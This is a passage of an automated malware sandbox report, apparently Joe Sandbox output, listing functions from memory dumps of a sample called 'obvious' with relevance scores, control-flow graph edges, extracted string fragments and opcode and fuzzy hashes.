                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dbec0c6fa9c65c95b0f22e2f2d80c85986f5a369bcfce5f83f5aba87eebbc5fe
                              • Instruction ID: 371a539127ac5f7aa6763141f757b40ca70d3e864826d14020050467626fed84
                              • Opcode Fuzzy Hash: dbec0c6fa9c65c95b0f22e2f2d80c85986f5a369bcfce5f83f5aba87eebbc5fe
                              • Instruction Fuzzy Hash: B7C12671A1E38A8FE3798B7484555B87BD0EF46310F0586BED48E8B1B6EF285507CB41
                              Function 00007FFD9BAE8C36 Relevance: .3, Instructions: 334COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 180ffda26e44179d53bb0830c5f00b9a74d6e6e40966e9ad1837047a3a0de190
                              • Instruction ID: 26fb58fc0c8a0d4e34fce8ed7e7b494608db90610a4c2866e42766c4c3c9ef3c
                              • Opcode Fuzzy Hash: 180ffda26e44179d53bb0830c5f00b9a74d6e6e40966e9ad1837047a3a0de190
                              • Instruction Fuzzy Hash: 2AA14831B0EA4A8FD76DDB7C94665B837D2FFA9321B0141BED00ACB2E2DD695C028740
                              Function 00007FFD9BCA02F0 Relevance: .3, Instructions: 296COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8caf7c58c934ae2ebde3baf72f00e1d9f36af4913581ca76de3640f390b77b4d
                              • Instruction ID: a9970a8868c25ba220bfe878e036429f374842f29fa4989d75ae775b89e4bc4b
                              • Opcode Fuzzy Hash: 8caf7c58c934ae2ebde3baf72f00e1d9f36af4913581ca76de3640f390b77b4d
                              • Instruction Fuzzy Hash: 88910431F0995D4BE768DBBC88657BC7BE2EF98310F05417AD00DE7296DE286D428781
                              Function 00007FFD9BAD5E13 Relevance: 29.3, Strings: 23, Instructions: 558COMMON
                              Download Yara Rule

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 7"q$ 8"q$(7"q$(8"q$07"q$08"q$87"q$88"q$@7"q$@8"q$H7"q$H8"q$P7"q$P8"q$X7"q$X8"q$`7"q$`8"q$h7"q$p7"q$x7"q$7"q$7"q
                              • API String ID: 0-600004247
                              • Opcode ID: 192271dd87c156f0786f46c52026478ae4bee9a327555d3f629e5045abfb0c6a
                              • Instruction ID: 222f6a349f65e3ce72d58c94952604a2fe25386b2248e3958afa93a6e70b4754
                              • Opcode Fuzzy Hash: 192271dd87c156f0786f46c52026478ae4bee9a327555d3f629e5045abfb0c6a
                              • Instruction Fuzzy Hash: CA02B76060EBDE6FD72997B848239DEBFE0AF06365B2546FDE0459B0E3D89C1806C711
                              Function 00007FFD9BAD8DA9 Relevance: 25.9, Strings: 20, Instructions: 852COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 342 7ffd9bad8da9-7ffd9bad8df1 344 7ffd9bad8e0b-7ffd9bad8ea9 call 7ffd9bad82b0 * 2 342->344 345 7ffd9bad8df3-7ffd9bad8e07 342->345 359 7ffd9bad8eab-7ffd9bad8ed2 344->359 360 7ffd9bad8ed3-7ffd9bad8ee8 344->360 345->344 359->360 363 7ffd9bad8eea call 7ffd9bad7cc0 360->363 364 7ffd9bad8ef8-7ffd9bad8f03 360->364 369 7ffd9bad8eef-7ffd9bad8ef1 363->369 366 7ffd9bad8f09-7ffd9bad8f36 364->366 367 7ffd9bada5b4 call 7ffd9bad7218 364->367 373 7ffd9bad8f37-7ffd9bad8f3d 366->373 374 7ffd9bada5b9 367->374 369->364 372 7ffd9bad8ef3 call 7ffd9bad0498 369->372 372->364 376 7ffd9bad8f3e-7ffd9bad8f4d 373->376 377 7ffd9bada49d-7ffd9bada5b3 373->377 378 7ffd9bada5be-7ffd9bada5c3 call 7ffd9bad7290 374->378 382 7ffd9bad8f4f-7ffd9bad8f5f 376->382 377->367 388 7ffd9bada5c8-7ffd9bada5cd call 7ffd9bad72c0 378->388 386 7ffd9bad8f61-7ffd9bad8f86 382->386 387 7ffd9bad8f90-7ffd9bad8f95 382->387 386->373 398 7ffd9bad8f88-7ffd9bad8f8e 386->398 387->378 390 7ffd9bad8f9b-7ffd9bad8fb8 387->390 399 7ffd9bada5d2 call 7ffd9bad72f0 388->399 390->382 397 7ffd9bad8fba-7ffd9bad8fdf 390->397 400 7ffd9bad8fe0-7ffd9bad8ff1 397->400 398->387 404 7ffd9bada5d7 399->404 405 7ffd9bad9022-7ffd9bad9027 400->405 406 7ffd9bad8ff3-7ffd9bad9020 400->406 410 7ffd9bada5dc-7ffd9bada5e1 call 7ffd9bad7320 404->410 405->388 407 7ffd9bad9028-7ffd9bad904a 405->407 406->405 407->400 412 7ffd9bad904c-7ffd9bad9083 407->412 424 7ffd9bada5e6-7ffd9bada5eb call 7ffd9bad7350 410->424 416 7ffd9bad9085-7ffd9bad909c 412->416 417 7ffd9bad90b4-7ffd9bad90b9 412->417 416->417 417->399 420 7ffd9bad90bf-7ffd9bad914b 417->420 420->410 442 7ffd9bad9151-7ffd9bad91dd 420->442 432 7ffd9bada5f0-7ffd9bada5f5 call 7ffd9bad7380 424->432 440 7ffd9bada5fa-7ffd9bada5ff call 7ffd9bad8538 432->440 448 7ffd9bada604-7ffd9bada609 call 7ffd9bad8568 440->448 442->424 458 7ffd9bad91e3-7ffd9bad925d 442->458 456 7ffd9bada60e call 7ffd9bad8598 448->456 461 7ffd9bada613 456->461 470 7ffd9bad9262-7ffd9bad926f 458->470 461->461 470->432 472 7ffd9bad9275-7ffd9bad92b4 470->472 472->470 477 7ffd9bad92b6-7ffd9bad9301 472->477 477->440 485 7ffd9bad9307-7ffd9bad9342 477->485 489 7ffd9bad9349-7ffd9bad9393 485->489 489->448 496 7ffd9bad9399-7ffd9bad93b6 489->496 496->489 498 7ffd9bad93b8-7ffd9bad9425 496->498 498->456 504 7ffd9bad942b-7ffd9bad9468 498->504 504->377
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ["q$ ["q$ ["q$ ["q$ ["q$ ["q$ ["q$ ["q$ ["q$ ["q$(["q$0["q$8["q$@["q$H["q$P["q$X["q$`["q$h["q$p["q
                              • API String ID: 0-1938359724
                              • Opcode ID: 64ac23ac81e835a5025da50f0e0dc5c4af297e5313f8351c65f27c939b97603a
                              • Instruction ID: 9ffbbd491a505727bacd31cd8b645f7c40c0ecead23a1da81ed76d7c1eebe272
                              • Opcode Fuzzy Hash: 64ac23ac81e835a5025da50f0e0dc5c4af297e5313f8351c65f27c939b97603a
                              • Instruction Fuzzy Hash: FA523A21B0EE8E0FE7A9EB7884256E93BD1EF86360B050AFED059C71E7DD685D018301
                              Function 00007FFD9BAD9531 Relevance: 11.7, Strings: 9, Instructions: 475COMMON
                              Download Yara Rule

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ["q$ ["q$ ["q$ ["q$ ["q$ ["q$ ["q$["q/$q
                              • API String ID: 0-2227984164
                              • Opcode ID: 078c2f3437c05e6153318b6de822dc4507c036337701e5f9d8c4e0dc8adca487
                              • Instruction ID: a879d1e35043ac6407433e67f97614f3ac1294412a6f6d78cf98bbef9286b165
                              • Opcode Fuzzy Hash: 078c2f3437c05e6153318b6de822dc4507c036337701e5f9d8c4e0dc8adca487
                              • Instruction Fuzzy Hash: 6FF15E61A0FACA4FE7A5977844292E97BE1FF96374B0546FED0898B0E7E96C5C05C300
                              Function 00007FFD9BAD9EA3 Relevance: 11.3, Strings: 8, Instructions: 1339COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 898 7ffd9bad9ea3-7ffd9bad9ea9 899 7ffd9bad9eab-7ffd9bad9eb6 898->899 900 7ffd9bad9eff-7ffd9bad9f0d 898->900 904 7ffd9bad9eb8-7ffd9bad9ed0 899->904 905 7ffd9bad9e3e-7ffd9bad9e67 899->905 903 7ffd9bad9f0e-7ffd9bad9f28 900->903 914 7ffd9bada7e7-7ffd9bada80e call 7ffd9bad8678 903->914 915 7ffd9bad9f2e-7ffd9bad9f3e 903->915 906 7ffd9bad9ed2-7ffd9bad9ede 904->906 907 7ffd9bad9e68-7ffd9bad9e93 905->907 906->907 908 7ffd9bad9ee0-7ffd9bad9efd 906->908 926 7ffd9bad9e99-7ffd9bad9ea2 907->926 927 7ffd9bada6c2-7ffd9bada7e2 call 7ffd9bad73a0 907->927 908->900 920 7ffd9bada813 914->920 917 7ffd9bad9f94-7ffd9bad9fac call 7ffd9bad7780 915->917 918 7ffd9bad9f40-7ffd9bad9f4b 915->918 936 7ffd9bad9fb0-7ffd9bad9fb3 917->936 918->906 928 7ffd9bad9f4d-7ffd9bad9f92 918->928 930 7ffd9bada818-7ffd9bada81d call 7ffd9bad8688 920->930 926->898 927->903 928->917 941 7ffd9bada822-7ffd9bada83b call 7ffd9bad86a0 930->941 936->930 938 7ffd9bad9fb9-7ffd9bada02a 936->938 938->936 953 7ffd9bada02c-7ffd9bada048 938->953 946 7ffd9bada840 941->946 949 7ffd9bada845-7ffd9bada85b 946->949 951 7ffd9bada88c-7ffd9bada896 949->951 952 7ffd9bada85d-7ffd9bada871 call 7ffd9bad86b0 949->952 954 7ffd9bada8a0-7ffd9bada8b1 951->954 952->951 953->941 961 7ffd9bada04e-7ffd9bada05e 953->961 959 7ffd9bada8b8-7ffd9bada8db 954->959 960 7ffd9bada8b3 954->960 962 7ffd9bada957-7ffd9bada968 959->962 963 7ffd9bada8dd-7ffd9bada924 959->963 960->959 965 7ffd9bada0b4-7ffd9bada0d3 call 7ffd9bad7780 961->965 966 7ffd9bada060-7ffd9bada0b2 961->966 967 7ffd9bada96a 962->967 968 7ffd9bada96f-7ffd9bada9aa 962->968 963->962 965->949 986 7ffd9bada0d9-7ffd9bada0e9 965->986 966->965 967->968 977 7ffd9bada9ac-7ffd9bada9f3 968->977 978 7ffd9badaa26-7ffd9badaa37 968->978 977->978 980 7ffd9badaa39 978->980 981 7ffd9badaa3e-7ffd9badaa79 978->981 980->981 993 7ffd9badaa7b-7ffd9badaac2 981->993 994 7ffd9badaaf5-7ffd9badab06 981->994 989 7ffd9bada0eb-7ffd9bada13d 986->989 990 7ffd9bada13f-7ffd9bada44b call 7ffd9bad7780 986->990 989->990 990->954 1088 7ffd9bada451-7ffd9bada48f call 7ffd9bad8910 990->1088 993->994 996 7ffd9badab08 994->996 997 7ffd9badab0d-7ffd9badab48 994->997 996->997 1006 7ffd9badab4a-7ffd9badab91 997->1006 1007 7ffd9badabc4-7ffd9badabd5 997->1007 1006->1007 1011 7ffd9badabdc-7ffd9badac17 1007->1011 1012 7ffd9badabd7 1007->1012 1020 7ffd9badac19-7ffd9badac60 1011->1020 1021 7ffd9badac93-7ffd9badaca4 1011->1021 1012->1011 1020->1021 1022 7ffd9badacab-7ffd9badacec 1021->1022 1023 7ffd9badaca6 1021->1023 1031 7ffd9badad68-7ffd9badad79 1022->1031 1032 7ffd9badacee-7ffd9badad5e 1022->1032 1023->1022 1033 7ffd9badad7b 1031->1033 1034 7ffd9badad80-7ffd9badadc1 1031->1034 1032->1031 1033->1034 1039 7ffd9badadc3-7ffd9badae08 1034->1039 1040 7ffd9badae3d-7ffd9badae4e 1034->1040 1039->1040 1042 7ffd9badae55-7ffd9badae97 1040->1042 1043 7ffd9badae50 1040->1043 1050 7ffd9badae99-7ffd9badaf08 1042->1050 1051 7ffd9badaf12-7ffd9badaf5a 1042->1051 1043->1042 1050->1051 1062 7ffd9badaf6a-7ffd9badafa8 1051->1062 1063 7ffd9badaf5c-7ffd9badaf66 1051->1063 1068 7ffd9baddb4e-7ffd9baddb57 1062->1068 1063->1062 1088->1068
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ["q$ ["q$ ["q$ ["q$ ["q$ \"q$H$H
                              • API String ID: 0-1027688036
                              • Opcode ID: 0393ce71753e58dcb165817b96d05cb4d8a150e3efad23eccc3411d31f9f0c7b
                              • Instruction ID: 9fc3223bbe4ecfd40a23b0fcd4499e221442d88cd910afd61e7ec12a87b1c605
                              • Opcode Fuzzy Hash: 0393ce71753e58dcb165817b96d05cb4d8a150e3efad23eccc3411d31f9f0c7b
                              • Instruction Fuzzy Hash: 31A28E30719A4E8FDB88EF58C895BE973E1FF98314F1446B9E419C729ACA34E841CB40
                              Function 00007FFD9BAE6736 Relevance: 10.2, Strings: 8, Instructions: 150COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1092 7ffd9bae6736-7ffd9bae6775 1095 7ffd9bae677b-7ffd9bae679b 1092->1095 1096 7ffd9bae6860-7ffd9bae686f 1092->1096 1095->1096 1097 7ffd9bae67a1-7ffd9bae67c1 1095->1097 1101 7ffd9bae6872-7ffd9bae68a7 call 7ffd9bae55f8 1096->1101 1102 7ffd9bae6871 1096->1102 1097->1096 1098 7ffd9bae67c7-7ffd9bae67e7 1097->1098 1098->1096 1100 7ffd9bae67e9-7ffd9bae6809 1098->1100 1100->1096 1103 7ffd9bae680b-7ffd9bae682b 1100->1103 1108 7ffd9bae68ac-7ffd9bae68c5 1101->1108 1102->1101 1103->1096 1105 7ffd9bae682d-7ffd9bae684d 1103->1105 1105->1096 1107 7ffd9bae684f-7ffd9bae685f 1105->1107
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: Z"q$Z"q$Z"q$Z"q$Z"q$Z"q$Z"q$Z"q
                              • API String ID: 0-1372621
                              • Opcode ID: 0b62a871d07236d64ccd888831708b3a2a238651f7678d85795f4f914b394c75
                              • Instruction ID: 4c0db4eb5b633eff1d175abb938c75c28bc3a1c0c7da0bc8f767f748a1da81c7
                              • Opcode Fuzzy Hash: 0b62a871d07236d64ccd888831708b3a2a238651f7678d85795f4f914b394c75
                              • Instruction Fuzzy Hash: E951C630219B9E8FC317DBA4C4A69D9BBE0FF05310F4649FAC44ACB173E6686985C752
                              Function 00007FFD9BAD9C65 Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2618 7ffd9bad9c65-7ffd9bad9c98 2621 7ffd9bad9c9a-7ffd9bad9cd4 2618->2621 2622 7ffd9bad9cf5-7ffd9bad9d4e 2618->2622 2629 7ffd9bad9cda-7ffd9bad9cf3 2621->2629 2630 7ffd9bada6a4-7ffd9bada6a9 call 7ffd9bad8600 2621->2630 2635 7ffd9bad9d4f-7ffd9bad9d69 2622->2635 2629->2622 2630->2635 2637 7ffd9bada6ae call 7ffd9bad8630 2635->2637 2638 7ffd9bad9d6f-7ffd9bad9dfe 2635->2638 2641 7ffd9bada6b3 2637->2641 2643 7ffd9bada6b8 call 7ffd9bad8660 2638->2643 2650 7ffd9bad9e04-7ffd9bad9e43 2638->2650 2641->2643 2646 7ffd9bada6bd 2643->2646 2646->2646 2650->2630
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ["q$ ["q$ ["q$ ["q$["q
                              • API String ID: 0-2962447644
                              • Opcode ID: b1d8a37fd90f70db95a29cde3717466236646c1824aa116d2765be70e693e053
                              • Instruction ID: 7123e01a2dccf11658b5d932dc61145a69bb3e6f54d2207191270b19088072c9
                              • Opcode Fuzzy Hash: b1d8a37fd90f70db95a29cde3717466236646c1824aa116d2765be70e693e053
                              • Instruction Fuzzy Hash: 8A612861A0FBCB0FE3AAD77444252E97BE0AF86364B0545FED0898B0E7EDAC5D058301
                              Function 00007FFD9BAD9A7A Relevance: 5.2, Strings: 4, Instructions: 207COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ["q$ ["q$ ["q$["q
                              • API String ID: 0-1167017441
                              • Opcode ID: 34ebc949d5ab1233d9f7db43e550b1bfcb8279fb90069d760e918d9aa07157e1
                              • Instruction ID: ba557884d5318a6caefbb17bf75ee1c92ffa1bb9181add983bfeae7986fd2e5b
                              • Opcode Fuzzy Hash: 34ebc949d5ab1233d9f7db43e550b1bfcb8279fb90069d760e918d9aa07157e1
                              • Instruction Fuzzy Hash: 90716B72A0F7CA4FE369D77444291E57FE1AF86264B0A46FED0898B0F7E9985C06C700
                              Function 00007FFD9BAD9478 Relevance: 3.8, Strings: 3, Instructions: 79COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ["q$p["q$x["q
                              • API String ID: 0-1705836491
                              • Opcode ID: a7a0ef4fa6805629eee28908a43fcf56476d17ac60b74773074d9bc1d03a9673
                              • Instruction ID: 36f9fcd4b8e87b192890f36ae70e5fa046a71873808b66fcef7a4cdd0b758d5f
                              • Opcode Fuzzy Hash: a7a0ef4fa6805629eee28908a43fcf56476d17ac60b74773074d9bc1d03a9673
                              • Instruction Fuzzy Hash: 73214BA1A0FACA0FD3A9D73804291E53FE1AF8627470546FED049CB1E7ED685C058300
                              Function 00007FFD9BADC198 Relevance: 3.7, Strings: 1, Instructions: 2467COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: aK_H
                              • API String ID: 0-2603984226
                              • Opcode ID: 10e557737795d49ccc6225f0b995229f5d38c461061d085523261440e36af2c0
                              • Instruction ID: ea99ab280df506fef16583cd777a16d02ef933722b3394850d89c2ae98acdf1a
                              • Opcode Fuzzy Hash: 10e557737795d49ccc6225f0b995229f5d38c461061d085523261440e36af2c0
                              • Instruction Fuzzy Hash: A3138130709A4E8FDBD5EF6884A9BA973E1FF98310F1445B9D45DC72A6DE789842CB00
                              Function 00007FFD9BAE15F8 Relevance: 3.0, Strings: 2, Instructions: 524COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: x6"q$x6"q
                              • API String ID: 0-1276134999
                              • Opcode ID: a61c91070be2fdaa611e7bcc83c532594951674844537e965058a823a9d259b9
                              • Instruction ID: 74d2c53b2df428b078e4fd7c197b713c8839f67c6e61b7dbd42b6f642caa21f3
                              • Opcode Fuzzy Hash: a61c91070be2fdaa611e7bcc83c532594951674844537e965058a823a9d259b9
                              • Instruction Fuzzy Hash: 46F16A20F0E65A4FE7789BA864651B977C1EF86330F15407ED08FC71EBDD6D69468202
                              Function 00007FFD9BAEBECA Relevance: 2.9, Strings: 2, Instructions: 367COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: Xa"q$`a"q
                              • API String ID: 0-1834776942
                              • Opcode ID: 80b7781ba57c4786d9b7ce7727887d0a9f7fcc8f39b33f3e654c701f12323003
                              • Instruction ID: be7f3f5965f454f1e76dface5f54e2399a9be4f9258c928cbc5b7c27cd5c59d8
                              • Opcode Fuzzy Hash: 80b7781ba57c4786d9b7ce7727887d0a9f7fcc8f39b33f3e654c701f12323003
                              • Instruction Fuzzy Hash: FFB14A32A0E68D0FE766A77898655F97BE0EF46314F0901FBD458CB0E3ED6C650A8741
                              Function 00007FFD9BAD2731 Relevance: 2.8, Strings: 2, Instructions: 336COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: @c"q$yR_H
                              • API String ID: 0-4140388885
                              • Opcode ID: 8bfd31acc78fce4d19cc429ee19f7af8e9a8318ba8a37020f659bb1394e6dc5e
                              • Instruction ID: f09ed7b6e3ad57c7c2b730eceb3a8e2eeef7123d64b3bbdc7a8edcce999455f2
                              • Opcode Fuzzy Hash: 8bfd31acc78fce4d19cc429ee19f7af8e9a8318ba8a37020f659bb1394e6dc5e
                              • Instruction Fuzzy Hash: C5A1E772F19A0D4FD764EB68D8556BDB3E1EFD9310F0102BAE44DC3296DE24AD428781
                              Function 00007FFD9BAD0E30 Relevance: 2.8, Strings: 2, Instructions: 333COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: @c"q$yR_H
                              • API String ID: 0-4140388885
                              • Opcode ID: 74f2aee4266844e8fa08db2cc92f99f96d7b60b989544b573bb6a1fab19d413a
                              • Instruction ID: 807b96aa9fb11c10034596c6b5a8fe2a130e2d8bd8802a022fa5cc8ce00f8f0b
                              • Opcode Fuzzy Hash: 74f2aee4266844e8fa08db2cc92f99f96d7b60b989544b573bb6a1fab19d413a
                              • Instruction Fuzzy Hash: 7BA1E732F19A0D4FE764EB68D8556BDB3E1EFD9310F0103BAE44EC3296DE6469428781
                              Function 00007FFD9BAE530F Relevance: 2.7, Strings: 2, Instructions: 236COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: X`"q$``"q
                              • API String ID: 0-2687767495
                              • Opcode ID: d51c158710fbffdab277487d923bce0078867c4b7e55c6f888e7451a8c173b2d
                              • Instruction ID: 42cdec08a2cb49d88f3029340e31fe30c528948b0c6470a23f99e13c153266f5
                              • Opcode Fuzzy Hash: d51c158710fbffdab277487d923bce0078867c4b7e55c6f888e7451a8c173b2d
                              • Instruction Fuzzy Hash: 40614C32A0E6CE0FE37197746C265E97FE1EF42321F0A01FAD498C70A3D99D160A8352
                              Function 00007FFD9BAE345E Relevance: 2.7, Strings: 2, Instructions: 200COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: _"q$_"q
                              • API String ID: 0-3592793180
                              • Opcode ID: 1f7c1137068a362420863f1d4e35c67a22977e23f3ce5407dede57ddae134df1
                              • Instruction ID: a8e30cc7ee31f74751e964a03615f435556ddacc00fd4ca15f89b9e18e383a4b
                              • Opcode Fuzzy Hash: 1f7c1137068a362420863f1d4e35c67a22977e23f3ce5407dede57ddae134df1
                              • Instruction Fuzzy Hash: D7613C3160AA8E4FD796DF68C854AE977E1FF45310F1445FDE45ACB2A6CA78AC02C700
                              Function 00007FFD9BAD2E19 Relevance: 2.6, Strings: 2, Instructions: 77COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 0c"q$8c"q
                              • API String ID: 0-3321867916
                              • Opcode ID: 8a6bde3358503507b1386b80898accd51518c1ff8e85ead02a381eafbba037f7
                              • Instruction ID: 64aca35b5a884010947f62f271664464887124f335221c1c4d9ac6d6a914d9be
                              • Opcode Fuzzy Hash: 8a6bde3358503507b1386b80898accd51518c1ff8e85ead02a381eafbba037f7
                              • Instruction Fuzzy Hash: DA11E72191EBC91FD32AA7744C2A5A57FD0DF57211F0A02FEE445C71E3EC996805C352
                              Function 00007FFD9BAD3E4D Relevance: 2.6, Strings: 2, Instructions: 71COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8\"q$6"q
                              • API String ID: 0-2546099626
                              • Opcode ID: caf2b3cc6c06980c201a07165067f7bee73685c414cc654f00cc85f06e37833f
                              • Instruction ID: 821ad15d5e72b96394cf3472006917b6fc22362d7c22b43d08c944d8b8e9572d
                              • Opcode Fuzzy Hash: caf2b3cc6c06980c201a07165067f7bee73685c414cc654f00cc85f06e37833f
                              • Instruction Fuzzy Hash: 6221E721A4F7CA0FD362977848761A57FE0DF52220B0A05EFD445CB0E3E88C48868316
                              Function 00007FFD9BAD99CE Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ["q$q
                              • API String ID: 0-1884266385
                              • Opcode ID: 5730f910f44a1aa2159c2d395b72fa4ccd77c350da2e76a8f2434715098db00a
                              • Instruction ID: 665d6da2d2dd283e61db9acc6187f16f6e7dbe68ed30f7740db173963ace3107
                              • Opcode Fuzzy Hash: 5730f910f44a1aa2159c2d395b72fa4ccd77c350da2e76a8f2434715098db00a
                              • Instruction Fuzzy Hash: E8112962A0FADA4FD765D77444296E53FE1EF46260B0506EED0898B0F7E8985D46C300
                              Function 00007FFD9BAD0E45 Relevance: 2.6, Strings: 2, Instructions: 64COMMON
                              Download Yara Rule
